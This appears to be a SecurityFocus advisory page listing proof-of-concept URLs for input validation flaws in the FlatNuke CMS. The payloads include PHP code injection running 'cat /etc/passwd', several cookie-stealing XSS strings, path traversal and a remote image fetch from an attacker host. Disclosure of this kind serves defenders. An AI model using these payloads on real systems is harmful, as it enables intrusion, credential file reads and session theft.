Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

FlatNuke Multiple Input Validation Vulnerabilities

No exploit is required to leverage either of these issues. The following proof of concepts have been released.
http://www.example.com/?cmd=<?php system("cat /etc/passwd")?>
http://www.example.com/forum/help.php?border=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/forum/help.php?back=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/forum/footer.php?back=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/forum/footer.php?border=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/flatnuke/index.php?mod=none_Search&find=1&where=null
http://www.example.com/flatnuke/print.php
http://www.example.com/flatnuke/thumb.php?image=null
http://www.example.com/flatnuke/thumb.php?image=../../non-webreadable/private/image.jpg
http://www.example.com/flatnuke/thumb.php?image=http://[attacker]/image.jpg
http://www.example.com/flatnuke/thumb.php?image=null







 

Privacy Statement
Copyright 2009, SecurityFocus